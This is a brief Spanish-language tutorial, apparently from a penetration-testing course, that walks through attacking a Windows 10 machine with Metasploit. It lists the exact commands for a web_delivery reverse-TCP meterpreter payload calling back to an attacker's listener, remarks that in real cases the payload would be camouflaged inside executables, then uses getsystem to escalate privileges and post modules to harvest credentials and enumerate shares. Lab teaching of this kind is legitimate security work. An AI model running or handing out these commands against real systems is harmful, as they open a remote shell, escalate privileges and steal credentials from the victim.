Windows meterpreter


WINDOWS:

Vamos a utilizar una máquina objetivo windows 10.

Vamos a utilizar otro modulo denominado webDelivery.


use exploit/multi/script/web_delivery
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.130
exploit

images/141-1.png

Nos indica que ejecutemos el exploit en la máquina objetivo.

Esto en casos reales sería obviamente camuflado en ejecutables o binarios para ser inyectado.

images/141-2.png

images/141-3.png

images/141-4.png

Para intentar elevar privilegios en windows meterpreter implementa un comando:


getsystem

También podemos usar esos módulos anteriores pero esta vez en windows.

images/141-5.png


run post/windows/gather/credentials/credential_collector

images/141-6.png


run post/windows/gather/enum_shares

images/141-7.png